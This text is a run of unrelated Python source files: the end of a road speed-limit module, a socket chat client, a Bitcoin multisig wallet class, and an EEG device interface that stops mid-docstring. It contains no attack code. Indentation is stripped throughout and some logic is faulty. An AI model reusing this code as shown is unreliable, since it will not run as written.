section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
# log = "RECV: " + str(is_highway)
# log += ", " + str(cam_limit_speed)
# log += ", " + str(cam_limit_speed_left_dist)
# log += ", " + str(section_limit_speed)
# log += ", " + str(section_left_dist)
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
v_limit = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - cam_limit_speed
v_diff = v_ego - v_limit
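# sec is the look-ahead time in seconds: the further we are above the camera limit,
# the earlier (further away) slowing down starts; with longitudinal control enabled the
# window is slightly shorter than in cruise-only mode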
if self.longcontrol:
sec = interp(v_diff, [2.7, 8.3], [15., 20.])
else:
sec = interp(v_diff, [2.7, 8.3], [17., 23.])
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
if not self.slowing_down:
self.start_dist = cam_limit_speed_left_dist * 1.2
self.slowing_down = True
first_started = True
else:
first_started = False
base = self.start_dist / 1.2 * 0.65
td = self.start_dist - base
d = cam_limit_speed_left_dist - base
if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
pp = d / td
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(
pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
if __name__ == "__main__":
main()
|
client.py
|
from network import Handler, poll
import sys
from threading import Thread
from time import sleep
myname = input('What is your name? ')
class Client(Handler):
def on_close(self):
pass
def on_msg(self, msg):
print(msg)
host, port = 'localhost', 8888
client = Client(host, port)
client.do_send({'join': myname})
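# the server is assumed to broadcast these dicts back to all connected clients; on_msg just prints them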
def periodic_poll():
while 1:
poll()
sleep(0.05) # seconds
thread = Thread(target=periodic_poll)
thread.daemon = True # die when the main thread dies
thread.start()
while 1:
mytxt = sys.stdin.readline().rstrip()
client.do_send({'speak': myname, 'txt': mytxt})
|
wallet.py
|
import copy, hashlib, json, logging, os
from time import time
from hwilib.descriptor import AddChecksum
from .device import Device
from .key import Key
from .helpers import decode_base58, der_to_bytes, get_xpub_fingerprint, sort_descriptor, fslock, parse_utxo
from hwilib.serializations import PSBT, CTransaction
from io import BytesIO
from .specter_error import SpecterError
import threading
# a gap of 20 addresses is what many wallets do
WALLET_CHUNK = 20
wallet_tx_batch = 100
class Wallet():
def __init__(
self,
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=False,
last_block=None,
):
self.name = name
self.alias = alias
self.description = description
self.address_type = address_type
self.address = address
self.address_index = address_index
self.change_address = change_address
self.change_index = change_index
self.keypool = keypool
self.change_keypool = change_keypool
self.recv_descriptor = recv_descriptor
self.change_descriptor = change_descriptor
self.keys = keys
self.devices = [
(
device
if isinstance(device, Device)
else device_manager.get_by_alias(device)
)
for device in devices
]
if None in self.devices:
raise Exception(
'A device used by this wallet could not be found!'
)
self.sigs_required = sigs_required
self.pending_psbts = pending_psbts
self.fullpath = fullpath
self.manager = manager
self.cli = self.manager.cli.wallet(
os.path.join(self.manager.cli_path, self.alias)
)
self.last_block = last_block
if address == '':
self.getnewaddress()
if change_address == '':
self.getnewaddress(change=True)
self.getdata()
self.update()
if old_format_detected or self.last_block != last_block:
self.save_to_file()
def update(self):
self.get_balance()
self.check_addresses()
self.get_info()
def check_addresses(self):
"""Checking the gap limit is still ok"""
if self.last_block is None:
obj = self.cli.listsinceblock()
txs = obj["transactions"]
last_block = obj["lastblock"]
else:
obj = self.cli.listsinceblock(self.last_block)
txs = obj["transactions"]
last_block = obj["lastblock"]
addresses = [tx["address"] for tx in txs]
# remove duplicates
addresses = list(dict.fromkeys(addresses))
if len(addresses) > 0:
# prepare rpc call
calls = [("getaddressinfo",addr) for addr in addresses]
# extract results
res = [r["result"] for r in self.cli.multi(calls)]
# extract last two indexes of hdkeypath
paths = [d["hdkeypath"].split("/")[-2:] for d in res if "hdkeypath" in d]
# get change and recv addresses
max_recv = max([int(p[1]) for p in paths if p[0]=="0"], default=-1)
max_change = max([int(p[1]) for p in paths if p[0]=="1"], default=-1)
# these calls will happen only if current addresses are used
while max_recv >= self.address_index:
self.getnewaddress(change=False)
while max_change >= self.change_index:
self.getnewaddress(change=True)
self.last_block = last_block
@staticmethod
def parse_old_format(wallet_dict, device_manager):
old_format_detected = False
new_dict = {}
new_dict.update(wallet_dict)
if 'key' in wallet_dict:
new_dict['keys'] = [wallet_dict['key']]
del new_dict['key']
old_format_detected = True
if 'device' in wallet_dict:
new_dict['devices'] = [wallet_dict['device']]
del new_dict['device']
old_format_detected = True
devices = [device_manager.get_by_alias(device) for device in new_dict['devices']]
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['recv_descriptor']:
new_dict['recv_descriptor'] = AddChecksum(new_dict['recv_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['change_descriptor']:
new_dict['change_descriptor'] = AddChecksum(new_dict['change_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if None in devices:
devices = [((device['name'] if isinstance(device, dict) else device) if (device['name'] if isinstance(device, dict) else device) in device_manager.devices else None) for device in new_dict['devices']]
if None in devices:
raise Exception('A device used by this wallet could not be found!')
else:
new_dict['devices'] = [device_manager.devices[device].alias for device in devices]
old_format_detected = True
new_dict['old_format_detected'] = old_format_detected
return new_dict
@classmethod
def from_json(cls, wallet_dict, device_manager, manager, default_alias='', default_fullpath=''):
name = wallet_dict['name'] if 'name' in wallet_dict else ''
alias = wallet_dict['alias'] if 'alias' in wallet_dict else default_alias
description = wallet_dict['description'] if 'description' in wallet_dict else ''
address = wallet_dict['address'] if 'address' in wallet_dict else ''
address_index = wallet_dict['address_index'] if 'address_index' in wallet_dict else 0
change_address = wallet_dict['change_address'] if 'change_address' in wallet_dict else ''
change_index = wallet_dict['change_index'] if 'change_index' in wallet_dict else 0
keypool = wallet_dict['keypool'] if 'keypool' in wallet_dict else 0
change_keypool = wallet_dict['change_keypool'] if 'change_keypool' in wallet_dict else 0
sigs_required = wallet_dict['sigs_required'] if 'sigs_required' in wallet_dict else 1
pending_psbts = wallet_dict['pending_psbts'] if 'pending_psbts' in wallet_dict else {}
fullpath = wallet_dict['fullpath'] if 'fullpath' in wallet_dict else default_fullpath
last_block = wallet_dict['last_block'] if 'last_block' in wallet_dict else None
wallet_dict = Wallet.parse_old_format(wallet_dict, device_manager)
try:
address_type = wallet_dict['address_type']
recv_descriptor = wallet_dict['recv_descriptor']
change_descriptor = wallet_dict['change_descriptor']
keys = [Key.from_json(key_dict) for key_dict in wallet_dict['keys']]
devices = wallet_dict['devices']
except:
raise Exception('Could not construct a Wallet object from the data provided.')
return cls(
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=wallet_dict['old_format_detected'],
last_block=last_block
)
def get_info(self):
try:
self.info = self.cli.getwalletinfo()
except Exception:
self.info = {}
def getdata(self):
try:
self.utxo = parse_utxo(self, self.cli.listunspent(0))
except Exception:
self.utxo = []
self.get_info()
# TODO: Should do the same for the non change address (?)
# check if address was used already
try:
value_on_address = self.cli.getreceivedbyaddress(
self.change_address,
0
)
except:
# Could happen if address not in wallet (wallet was imported)
# try adding keypool
self.keypoolrefill(0, end=self.keypool, change=False)
self.keypoolrefill(0, end=self.change_keypool, change=True)
value_on_address = 0
# if not - just return
if value_on_address > 0:
self.change_index += 1
self.getnewaddress(change=True)
@property
def json(self):
return {
"name": self.name,
"alias": self.alias,
"description": self.description,
"address_type": self.address_type,
"address": self.address,
"address_index": self.address_index,
"change_address": self.change_address,
"change_index": self.change_index,
"keypool": self.keypool,
"change_keypool": self.change_keypool,
"recv_descriptor": self.recv_descriptor,
"change_descriptor": self.change_descriptor,
"keys": [key.json for key in self.keys],
"devices": [device.alias for device in self.devices],
"sigs_required": self.sigs_required,
"pending_psbts": self.pending_psbts,
"fullpath": self.fullpath,
"last_block": self.last_block,
"blockheight": self.blockheight
}
def save_to_file(self):
with fslock:
with open(self.fullpath, "w+") as f:
f.write(json.dumps(self.json, indent=4))
self.manager.update()
@property
def is_multisig(self):
return len(self.keys) > 1
@property
def locked_amount(self):
amount = 0
for psbt in self.pending_psbts:
amount += sum([utxo["witness_utxo"]["amount"] for utxo in self.pending_psbts[psbt]["inputs"]])
return amount
def delete_pending_psbt(self, txid):
try:
self.cli.lockunspent(True, self.pending_psbts[txid]["tx"]["vin"])
except:
# UTXO was spent
pass
if txid in self.pending_psbts:
del self.pending_psbts[txid]
self.save_to_file()
def update_pending_psbt(self, psbt, txid, raw):
if txid in self.pending_psbts:
self.pending_psbts[txid]["base64"] = psbt
decodedpsbt = self.cli.decodepsbt(psbt)
signed_devices = self.get_signed_devices(decodedpsbt)
self.pending_psbts[txid]["devices_signed"] = [dev.name for dev in signed_devices]
if "hex" in raw:
self.pending_psbts[txid]["sigs_count"] = self.sigs_required
self.pending_psbts[txid]["raw"] = raw["hex"]
else:
self.pending_psbts[txid]["sigs_count"] = len(signed_devices)
self.save_to_file()
return self.pending_psbts[txid]
else:
raise SpecterError("Can't find pending PSBT with this txid")
def save_pending_psbt(self, psbt):
self.pending_psbts[psbt["tx"]["txid"]] = psbt
self.cli.lockunspent(False, psbt["tx"]["vin"])
self.save_to_file()
def txlist(self, idx, wallet_tx_batch=100):
try:
cli_txs = self.cli.listtransactions("*", wallet_tx_batch + 2, wallet_tx_batch * idx, True) # get batch + 2 to make sure you have information about send
cli_txs.reverse()
transactions = cli_txs[:wallet_tx_batch]
except:
return []
txids = []
result = []
for tx in transactions:
if 'confirmations' not in tx:
tx['confirmations'] = 0
if len([_tx for _tx in cli_txs if (_tx['txid'] == tx['txid'] and _tx['address'] == tx['address'])]) > 1:
continue # means the tx is duplicated (change), continue
txids.append(tx["txid"])
result.append(tx)
return result
def rescanutxo(self):
t = threading.Thread(target=self._rescan_utxo_thread)
t.start()
def _rescan_utxo_thread(self):
args = [
"start",
[{
"desc": self.recv_descriptor,
"range": self.keypool
},{
"desc": self.change_descriptor,
"range": self.change_keypool
}]
]
unspents = self.cli.scantxoutset(*args)["unspents"]
res = self.cli.multi([
("getblockhash", tx["height"])
for tx in unspents
])
block_hashes = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["blockhash"] = block_hashes[i]
res = self.cli.multi([
("gettxoutproof", [tx["txid"]], tx["blockhash"])
for tx in unspents
])
proofs = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["proof"] = proofs[i]
res = self.cli.multi([
("getrawtransaction", tx["txid"], False, tx["blockhash"])
for tx in unspents
])
raws = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["raw"] = raws[i]
self.cli.multi([
("importprunedfunds", tx["raw"], tx["proof"])
for tx in unspents
])
@property
def rescan_progress(self):
"""Returns None if rescanblockchain is not launched,
value between 0 and 1 otherwise
"""
if not self.info or "scanning" not in self.info or self.info["scanning"] == False:
return None
else:
return self.info["scanning"]["progress"]
@property
def blockheight(self):
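# page through listtransactions (100 at a time) until the oldest page is reached, then use
# that transaction's confirmation count to estimate the earliest block height relevant to this wallet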
txs = self.cli.listtransactions("*", 100, 0, True)
i = 0
while (len(txs) == 100):
i += 1
next_txs = self.cli.listtransactions("*", 100, i * 100, True)
if (len(next_txs) > 0):
txs = next_txs
else:
break
current_blockheight = self.cli.getblockcount()
if len(txs) > 0 and 'confirmations' in txs[0]:
blockheight = current_blockheight - txs[0]['confirmations'] - 101 # To ensure coinbase transactions are indexed properly
return 0 if blockheight < 0 else blockheight # To ensure regtest don't have negative blockheight
return current_blockheight
@property
def account_map(self):
return '{ "label": "' + self.name + '", "blockheight": ' + str(self.blockheight) + ', "descriptor": "' + self.recv_descriptor.replace("/", "\\/") + '" }'
def getnewaddress(self, change=False):
label = "Change" if change else "Address"
if change:
self.change_index += 1
index = self.change_index
else:
self.address_index += 1
index = self.address_index
address = self.get_address(index, change=change)
self.setlabel(address, "{} #{}".format(label, index))
if change:
self.change_address = address
else:
self.address = address
self.save_to_file()
return address
def get_address(self, index, change=False):
pool = self.change_keypool if change else self.keypool
if pool < index + WALLET_CHUNK:
self.keypoolrefill(pool, index + WALLET_CHUNK, change=change)
desc = self.change_descriptor if change else self.recv_descriptor
if self.is_multisig:
try:
# first try with sortedmulti
addr = self.cli.deriveaddresses(desc, [index, index+1])[0]
except:
# if sortedmulti is not supported
desc = sort_descriptor(self.cli, desc, index=index, change=change)
addr = self.cli.deriveaddresses(desc)[0]
return addr
return self.cli.deriveaddresses(desc, [index, index + 1])[0]
def get_balance(self):
try:
self.balance = self.cli.getbalances()["watchonly"]
except:
self.balance = { "trusted": 0, "untrusted_pending": 0 }
return self.balance
def keypoolrefill(self, start, end=None, change=False):
if end is None:
end = start + WALLET_CHUNK
desc = self.recv_descriptor if not change else self.change_descriptor
args = [
{
"desc": desc,
"internal": change,
"range": [start, end],
"timestamp": "now",
"keypool": True,
"watchonly": True
}
]
if not self.is_multisig:
r = self.cli.importmulti(args, {"rescan": False})
# bip67 requires sorted public keys for multisig addresses
else:
# try if sortedmulti is supported
r = self.cli.importmulti(args, {"rescan": False})
# doesn't raise, but instead returns "success": False
if not r[0]['success']:
# first import normal multi
# remove checksum
desc = desc.split("#")[0]
# switch to multi
desc = desc.replace("sortedmulti", "multi")
# add checksum
desc = AddChecksum(desc)
# update descriptor
args[0]["desc"] = desc
r = self.cli.importmulti(args, {"rescan": False})
# make a batch of single addresses to import
arg = args[0]
# remove range key
arg.pop("range")
batch = []
for i in range(start, end):
sorted_desc = sort_descriptor(
self.cli,
desc,
index=i,
change=change
)
# create fresh object
obj = {}
obj.update(arg)
obj.update({"desc": sorted_desc})
batch.append(obj)
r = self.cli.importmulti(batch, {"rescan": False})
if change:
self.change_keypool = end
else:
self.keypool = end
self.save_to_file()
return end
def utxo_on_address(self, address):
utxo = [tx for tx in self.utxo if tx["address"] == address]
return len(utxo)
def balance_on_address(self, address):
balancelist = [utxo["amount"] for utxo in self.utxo if utxo["address"] == address]
return sum(balancelist)
def utxo_on_label(self, label):
utxo = [tx for tx in self.utxo if self.getlabel(tx["address"]) == label]
return len(utxo)
def balance_on_label(self, label):
balancelist = [utxo["amount"] for utxo in self.utxo if self.getlabel(utxo["address"]) == label]
return sum(balancelist)
def addresses_on_label(self, label):
return list(dict.fromkeys(
[address for address in (self.addresses + self.change_addresses) if self.getlabel(address) == label]
))
@property
def is_current_address_used(self):
return self.balance_on_address(self.address) > 0
@property
def utxo_addresses(self):
return list(dict.fromkeys([utxo["address"] for utxo in sorted(self.utxo, key = lambda utxo: utxo["time"])]))
@property
def utxo_labels(self):
return list(dict.fromkeys([self.getlabel(utxo["address"]) for utxo in sorted(self.utxo, key = lambda utxo: utxo["time"])]))
def setlabel(self, address, label):
self.cli.setlabel(address, label)
def getlabel(self, address):
address_info = self.cli.getaddressinfo(address)
# Bitcoin Core version 0.20.0 has replaced the `label` field with `labels`, an array currently limited to a single item.
label = address_info["labels"][0] if (
"labels" in address_info
and (isinstance(address_info["labels"], list)
and len(address_info["labels"]) > 0)
and "label" not in address_info) else address
if label == "":
label = address
return address_info["label"] if "label" in address_info and address_info["label"] != "" else label
def get_address_name(self, address, addr_idx):
if self.getlabel(address) == address and addr_idx > -1:
self.setlabel(address, "Address #{}".format(addr_idx))
return self.getlabel(address)
@property
def fullbalance(self):
balance = self.balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def available_balance(self):
locked_utxo = self.cli.listlockunspent()
# copy
balance = {}
balance.update(self.balance)
for tx in locked_utxo:
tx_data = self.cli.gettransaction(tx["txid"])
raw_tx = self.cli.decoderawtransaction(tx_data["hex"])
if "confirmations" not in tx_data or tx_data["confirmations"] == 0:
balance["untrusted_pending"] -= raw_tx["vout"][tx["vout"]]["value"]
else:
balance["trusted"] -= raw_tx["vout"][tx["vout"]]["value"]
return balance
@property
def full_available_balance(self):
balance = self.available_balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def addresses(self):
return [self.get_address(idx) for idx in range(0, self.address_index + 1)]
@property
def active_addresses(self):
return list(dict.fromkeys(self.addresses + self.utxo_addresses))
@property
def change_addresses(self):
return [self.get_address(idx, change=True) for idx in range(0, self.change_index + 1)]
@property
def wallet_addresses(self):
return self.addresses + self.change_addresses
@property
def labels(self):
return list(dict.fromkeys([self.getlabel(addr) for addr in self.active_addresses]))
def createpsbt(self, addresses:[str], amounts:[float], subtract:bool=False, fee_rate:float=0.0, fee_unit="SAT_B", selected_coins=[]):
"""
fee_rate: fee rate in sat/B or BTC/kB, depending on fee_unit. If 0.0, Bitcoin Core chooses the fee rate automatically.
"""
if self.full_available_balance < sum(amounts):
raise SpecterError('The wallet does not have sufficient funds to make the transaction.')
if fee_unit not in ["SAT_B", "BTC_KB"]:
raise ValueError('Invalid bitcoin unit')
extra_inputs = []
if self.available_balance["trusted"] < sum(amounts):
txlist = self.cli.listunspent(0, 0)
b = sum(amounts) - self.available_balance["trusted"]
for tx in txlist:
extra_inputs.append({"txid": tx["txid"], "vout": tx["vout"]})
b -= tx["amount"]
if b < 0:
break
elif selected_coins != []:
still_needed = sum(amounts)
for coin in selected_coins:
coin_txid = coin.split(",")[0]
coin_vout = int(coin.split(",")[1])
coin_amount = float(coin.split(",")[2])
extra_inputs.append({"txid": coin_txid, "vout": coin_vout})
still_needed -= coin_amount
if still_needed < 0:
break
if still_needed > 0:
raise SpecterError("Selected coins does not cover Full amount! Please select more coins!")
# subtract fee from amount of this output:
# currently only one address is supported, so either
# empty array (subtract from change) or [0]
subtract_arr = [0] if subtract else []
options = {
"includeWatching": True,
"changeAddress": self.change_address,
"subtractFeeFromOutputs": subtract_arr
}
self.setlabel(self.change_address, "Change #{}".format(self.change_index))
if fee_rate > 0.0 and fee_unit == "SAT_B":
# bitcoin core needs us to convert sat/B to BTC/kB
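# fee_rate [sat/B] * 1e-8 [BTC/sat] * 1024 [B/kB] -> BTC/kB (1 kB is taken as 1024 bytes here)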
options["feeRate"] = fee_rate / 10 ** 8 * 1024
# don't reuse change addresses - use getrawchangeaddress instead
r = self.cli.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True # replaceable
)
b64psbt = r["psbt"]
psbt = self.cli.decodepsbt(b64psbt)
psbt['base64'] = b64psbt
psbt["amount"] = amounts
psbt["address"] = addresses
psbt["time"] = time()
psbt["sigs_count"] = 0
self.save_pending_psbt(psbt)
return psbt
def fill_psbt(self, b64psbt, non_witness:bool=True, xpubs:bool=True):
psbt = PSBT()
psbt.deserialize(b64psbt)
if non_witness:
for i, inp in enumerate(psbt.tx.vin):
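# attach the full previous transaction (non_witness_utxo) for each input so signers
# that require it can verify the amounts being spent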
txid = inp.prevout.hash.to_bytes(32,'big').hex()
try:
res = self.cli.gettransaction(txid)
except:
raise SpecterError("Can't find previous transaction in the wallet.")
stream = BytesIO(bytes.fromhex(res["hex"]))
prevtx = CTransaction()
prevtx.deserialize(stream)
psbt.inputs[i].non_witness_utxo = prevtx
if xpubs:
# for multisig add xpub fields
if len(self.keys) > 1:
for k in self.keys:
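# BIP 174 global xpub record: key is type byte 0x01 plus the raw xpub, value is the
# master fingerprint followed by the derivation path bytes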
key = b'\x01' + decode_base58(k.xpub)
if k.fingerprint != '':
fingerprint = bytes.fromhex(k.fingerprint)
else:
fingerprint = get_xpub_fingerprint(k.xpub)
if k.derivation != '':
der = der_to_bytes(k.derivation)
else:
der = b''
value = fingerprint + der
psbt.unknown[key] = value
return psbt.serialize()
def get_signed_devices(self, decodedpsbt):
signed_devices = []
# check who already signed
for i, key in enumerate(self.keys):
sigs = 0
for inp in decodedpsbt["inputs"]:
if "bip32_derivs" not in inp:
# how are we going to sign it???
break
if "partial_signatures" not in inp:
# nothing to update - no signatures for this input
break
for der in inp["bip32_derivs"]:
if der["master_fingerprint"] == key.fingerprint:
if der["pubkey"] in inp["partial_signatures"]:
sigs += 1
# ok we have all signatures from this key (device)
if sigs >= len(decodedpsbt["inputs"]):
# assuming that order of self.devices and self.keys is the same
signed_devices.append(self.devices[i])
return signed_devices
def importpsbt(self, b64psbt):
# TODO: check maybe some of the inputs are already locked
psbt = self.cli.decodepsbt(b64psbt)
psbt['base64'] = b64psbt
amount = 0
address = None
# get output address and amount
for out in psbt["tx"]["vout"]:
if "addresses" not in out["scriptPubKey"] or len(out["scriptPubKey"]["addresses"]) == 0:
# TODO: we need to handle it somehow differently
raise SpecterError("Sending to raw scripts is not supported yet")
addr = out["scriptPubKey"]["addresses"][0]
info = self.cli.getaddressinfo(addr)
# check if it's a change
if info["iswatchonly"] or info["ismine"]:
continue
# if not - this is our address
# oops, more than one sending address
if address is not None:
# TODO: we need to have multiple address support
raise SpecterError("Sending to multiple addresses is not supported yet")
address = addr
amount += out["value"]
# detect signatures
signed_devices = self.get_signed_devices(psbt)
psbt["devices_signed"] = [dev.name for dev in signed_devices]
psbt["amount"] = amount
psbt["address"] = address
psbt["time"] = time()
psbt["sigs_count"] = len(signed_devices)
raw = self.cli.finalizepsbt(b64psbt)
if "hex" in raw:
psbt["raw"] = raw["hex"]
self.save_pending_psbt(psbt)
return psbt
|
explore.py
|
# -*- coding: utf-8 -*-
from explorepy.bt_client import BtClient
from explorepy.parser import Parser
from explorepy.dashboard.dashboard import Dashboard
from explorepy._exceptions import *
from explorepy.packet import CommandRCV, CommandStatus, CalibrationInfo, DeviceInfo
from explorepy.tools import FileRecorder
import csv
import os
import time
import signal
import sys
from pylsl import StreamInfo, StreamOutlet
from threading import Thread, Timer
class Explore:
r"""Mentalab Explore device"""
def __init__(self, n_device=1, calibre_file=None):
r"""
Args:
n_device (int): Number of devices to be connected
calibre_file (str): Calibration data file name
"""
self.device = []
self.socket = None
self.parser = None
self.m_dashboard = None
for i in range(n_device):
self.device.append(BtClient())
self.is_connected = False
self.is_acquiring = None
self.calibration_file = calibre_file
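# Illustrative usage (the device name is a placeholder):
#   explore = Explore()
#   explore.connect(device_name="Explore_XXXX")
#   explore.acquire(duration=10)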
def connect(self, device_name=None, device_addr=None, device_id=0):
r"""
Connects to the nearby device. If there are more than one device, the user is asked to choose one of them.
Args:
device_name (str): Device name in the format of "Explore_XXXX"
device_addr (str): The MAC address in format "XX:XX:XX:XX:XX:XX". Either the address or the name must be given.
device_id (int): device id (not needed in the current version)
"""
self.device[device_id].init_bt(device_name=device_name, device_addr=device_addr)
if self.socket is None:
self.socket = self.device[device_id].bt_connect()
if self.parser is None:
self.parser = Parser(socket=self.socket, calibration_file=self.calibration_file)
self.is_connected = True
packet = None
def disconnect(self, device_id=None):
r"""Disconnects from the device
Args:
device_id (int): device id (not needed in the current version)
"""
self.device[device_id].socket.close()
self.is_connected = False
def acquire(self, device_id=0, duration=None):
r"""Start getting data from the device
Args:
device_id (int): device id (not needed in the current version)
duration (float): duration of acquiring data (if None it streams data endlessly)
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
is_acquiring = [True]
def stop_acquiring(flag):
flag[0] = False
if duration is not None:
Timer(duration, stop_acquiring, [is_acquiring]).start()
print("Start acquisition for ", duration, " seconds...")
while is_acquiring[0]:
try:
self.parser.parse_packet(mode="print")
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
print("Data acquisition stopped after ", duration, " seconds.")
def record_data(self, file_name, do_overwrite=False, device_id=0, duration=None, file_type='csv'):
r"""Records the data in real-time
Args:
file_name (str): Output file name
device_id (int): Device id (not needed in the current version)
do_overwrite (bool): Overwrite if files exist already
duration (float): Duration of recording in seconds (if None records endlessly).
file_type (str): File type of the recorded file. Supported file types: 'csv', 'edf'
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
# Check invalid characters
if set(r'<>{}[]~`*%').intersection(file_name):
raise ValueError("Invalid character in file name")
n_chan = self.parser.n_chan
if file_type not in ['edf', 'csv']:
raise ValueError('{} is not a supported file extension!'.format(file_type))
time_offset = None
exg_out_file = file_name + "_ExG"
orn_out_file = file_name + "_ORN"
marker_out_file = file_name + "_Marker"
exg_ch = ['TimeStamp', 'ch1', 'ch2', 'ch3', 'ch4', 'ch5', 'ch6', 'ch7', 'ch8'][0:n_chan+1]
exg_unit = ['s', 'V', 'V', 'V', 'V', 'V', 'V', 'V', 'V'][0:n_chan+1]
exg_max = [86400, .4, .4, .4, .4, .4, .4, .4, .4][0:n_chan + 1]
exg_min = [0, -.4, -.4, -.4, -.4, -.4, -.4, -.4, -.4][0:n_chan + 1]
exg_recorder = FileRecorder(file_name=exg_out_file, ch_label=exg_ch, fs=self.parser.fs, ch_unit=exg_unit,
file_type=file_type, do_overwrite=do_overwrite, ch_min=exg_min, ch_max=exg_max)
orn_ch = ['TimeStamp', 'ax', 'ay', 'az', 'gx', 'gy', 'gz', 'mx', 'my', 'mz']
orn_unit = ['s', 'mg', 'mg', 'mg', 'mdps', 'mdps', 'mdps', 'mgauss', 'mgauss', 'mgauss']
orn_max = [86400, 2000, 2000, 2000, 250000, 250000, 250000, 50000, 50000, 50000]
orn_min = [0, -2000, -2000, -2000, -250000, -250000, -250000, -50000, -50000, -50000]
orn_recorder = FileRecorder(file_name=orn_out_file, ch_label=orn_ch, fs=20,
ch_unit=orn_unit, file_type=file_type, do_overwrite=do_overwrite,
ch_min=orn_min, ch_max=orn_max)
if file_type == 'csv':
marker_ch = ['TimeStamp', 'Code']
marker_unit = ['s', '-']
marker_recorder = FileRecorder(file_name=marker_out_file, ch_label=marker_ch, fs=0,
ch_unit=marker_unit, file_type=file_type, do_overwrite=do_overwrite)
elif file_type == 'edf':
marker_recorder = exg_recorder
is_acquiring = [True]
def stop_acquiring(flag):
flag[0] = False
if duration is not None:
if duration <= 0:
raise ValueError("Recording time must be a positive number!")
rec_timer = Timer(duration, stop_acquiring, [is_acquiring])
rec_timer.start()
print("Start recording for ", duration, " seconds...")
else:
print("Recording...")
is_disconnect_occurred = False
while is_acquiring[0]:
try:
packet = self.parser.parse_packet(mode="record", recorders=(exg_recorder, orn_recorder, marker_recorder))
if time_offset is not None:
packet.timestamp = packet.timestamp-time_offset
else:
time_offset = packet.timestamp
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
rec_timer.cancel()
return 0
if is_disconnect_occurred:
print("Error: Recording finished before ", duration, "seconds.")
rec_timer.cancel()
else:
print("Recording finished after ", duration, " seconds.")
exg_recorder.stop()
orn_recorder.stop()
if file_type == 'csv':
marker_recorder.stop()
def push2lsl(self, device_id=0, duration=None):
r"""Push samples to two lsl streams
Args:
device_id (int): device id (not needed in the current version)
duration (float): duration of data acquiring (if None it streams endlessly).
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
info_orn = StreamInfo('Explore', 'Orientation', 13, 20, 'float32', 'ORN')
info_exg = StreamInfo('Explore', 'ExG', self.parser.n_chan, self.parser.fs, 'float32', 'ExG')
info_marker = StreamInfo('Explore', 'Markers', 1, 0, 'int32', 'Marker')
orn_outlet = StreamOutlet(info_orn)
exg_outlet = StreamOutlet(info_exg)
marker_outlet = StreamOutlet(info_marker)
is_acquiring = [True]
def stop_acquiring(flag):
flag[0] = False
if duration is not None:
Timer(duration, stop_acquiring, [is_acquiring]).start()
print("Start pushing to lsl for ", duration, " seconds...")
else:
print("Pushing to lsl...")
while is_acquiring[0]:
try:
self.parser.parse_packet(mode="lsl", outlets=(orn_outlet, exg_outlet, marker_outlet))
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
print("Data acquisition finished after ", duration, " seconds.")
def visualize(self, device_id=0, bp_freq=(1, 30), notch_freq=50, calibre_file=None):
r"""Visualization of the signal in the dashboard
Args:
device_id (int): Device ID (not needed in the current version)
bp_freq (tuple): Bandpass filter cut-off frequencies (low_cutoff_freq, high_cutoff_freq). No bandpass
filter is applied if it is None.
